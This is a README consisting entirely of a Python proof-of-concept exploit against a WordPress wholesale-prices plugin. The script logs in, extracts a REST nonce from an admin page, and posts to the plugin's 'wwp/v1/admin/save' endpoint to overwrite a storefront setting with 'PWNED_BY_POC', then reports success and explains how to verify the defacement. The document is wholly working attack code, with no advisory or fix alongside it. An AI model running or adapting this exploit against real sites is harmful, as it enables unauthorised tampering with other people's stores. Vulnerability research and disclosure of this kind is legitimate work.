README.md
Rendering markdown...
import re
import sys
import json
import argparse
import requests
from urllib.parse import urljoin
def wp_login(session, base_url, username, password):
login_url = urljoin(base_url, "/wp-login.php")
r = session.get(login_url, timeout=20)
if r.status_code != 200:
print("[-] Failed to load login page")
sys.exit(1)
data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": urljoin(base_url, "/wp-admin/"),
"testcookie": "1"
}
r = session.post(login_url, data=data, timeout=20, allow_redirects=True)
if "wp-admin" not in r.url:
print("[-] Login failed")
sys.exit(1)
print("[+] Logged in successfully")
cookies = session.cookies.get_dict()
if not any("wordpress_logged_in" in k for k in cookies):
print("[-] Missing wordpress_logged_in cookie")
sys.exit(1)
def extract_nonce_and_rest(html):
match = re.search(r'wpApiSettings\s*=\s*(\{.*?\})', html)
if match:
try:
data = json.loads(match.group(1))
if "nonce" in data and "root" in data:
print("[+] Using wpApiSettings nonce")
return data["nonce"], data["root"]
except Exception:
pass
print("[!] wpApiSettings not found, fallback mode")
nonce_candidates = re.findall(r'"nonce":"([a-f0-9]+)"', html)
rest_match = re.search(r'"root":"([^"]+)"', html)
if not nonce_candidates or not rest_match:
print("[-] Failed to extract nonce or REST root")
sys.exit(1)
rest_root = json.loads(f'"{rest_match.group(1)}"')
print(f"[!] Found {len(nonce_candidates)} nonce candidates")
return nonce_candidates[0], rest_root
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--base-url", required=True)
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
base_url = args.base_url.strip().rstrip("/")
if not base_url.startswith("http"):
print("[-] Invalid base URL")
sys.exit(1)
session = requests.Session()
print(f"[+] Base URL: {base_url}")
print(f"[+] Username: {args.username}")
wp_login(session, base_url, args.username, args.password)
admin_url = urljoin(
base_url,
"/wp-admin/admin.php?page=wholesale-settings&tab=wholesale_prices"
)
r = session.get(admin_url, timeout=20)
if r.status_code != 200:
print("[-] Failed to access admin page")
sys.exit(1)
print(f"[+] Accessed admin page: {admin_url}")
nonce, rest_root = extract_nonce_and_rest(r.text)
print(f"[+] Nonce: {nonce}")
print(f"[+] REST root: {rest_root}")
payload = [
{
"key": "wwp_see_wholesale_prices_replacement_text",
"value": "PWNED_BY_POC"
}
]
target = urljoin(rest_root, "wwp/v1/admin/save")
headers = {
"X-WP-Nonce": nonce,
"Content-Type": "application/json",
"Referer": admin_url,
"Origin": base_url,
"User-Agent": "Mozilla/5.0 (PoC)"
}
print(f"[+] Sending payload to: {target}")
r = session.post(
target,
json=payload,
headers=headers,
timeout=20
)
print(f"[+] HTTP status: {r.status_code}")
print(r.text)
if r.status_code == 200:
print("[+] PoC SUCCESS (pwnd)")
print("[*] Verify via incognito (not logged in):")
print(" - Open product page")
print(" - Look for: PWNED_BY_POC")
else:
print("[-] PoC failed")
if args.debug:
print("[DEBUG] Cookies:", session.cookies.get_dict())
if __name__ == "__main__":
main()